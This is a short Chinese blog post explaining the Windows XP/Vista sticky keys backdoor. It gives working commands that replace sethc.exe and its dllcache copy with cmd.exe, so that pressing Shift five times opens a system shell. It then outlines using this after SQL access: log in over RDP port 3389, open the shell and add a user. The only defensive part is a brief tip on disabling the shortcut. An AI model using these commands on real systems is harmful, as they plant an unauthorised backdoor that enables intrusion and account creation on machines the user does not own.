文章作者:姜南(Slyar) 文章来源:Slyar Home (www.slyar.com) 转载请注明,谢谢合作。
大学里面有同学问,我直接写出来凑文章数好了。某几个人勿要鄙视我,看看你们写那么高深的东西有几个人去看……我这叫普及安全知识,懂不懂?
好了,回归正题,既然是粘滞键漏洞,首先我们要知道粘滞键是什么。
“粘滞键”是为同时按下两个或更多个键有困难的人设计的。当快捷方式要求使用诸如 CTRL 键 + S 键等的组合键时,“粘滞键”允许用户按下修改键(CTRL 键、ALT 键或 SHIFT 键)或 Windows 徽标键之后,它能保持这些键的活动状态直到按下其他键。
那么怎么调用出粘滞键呢?很简单,按五次shift键,之后就会出现粘滞键的应用程序了。
重点在这。既然按五次shift键会出现粘滞键程序,那么就一定有一个exe跟他关联,而这个exe是可以通过按五次shift键来运行的。如果我们把这个被激活的程序替换成cmd.exe,那么只要我们按五次shift键,就会得到一个cmdshell了。
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
恩,差不多就是这些命令,把sethc.exe替换成我们的cmd.exe,运行之后按五次shift看看,是不是出现了shell?
这个应用应该是很广泛的,比如我们在SQL里把粘滞键程序换掉,然后直接3389登陆上去,再之后按五次shift,最后加用户,登入……恩,就这样吧,简单介绍,其他应用自己琢磨去。
最后说一下如何禁用粘滞键功能。开始–设置–控制面板–辅助功能选项–(粘滞键)设置–把”使用快捷键”前面的勾去掉,完成。现在按五次shift就无法调出粘滞键程序了。
转载请注明:Slyar Home » 简单说下XP/Vista的粘滞键漏洞
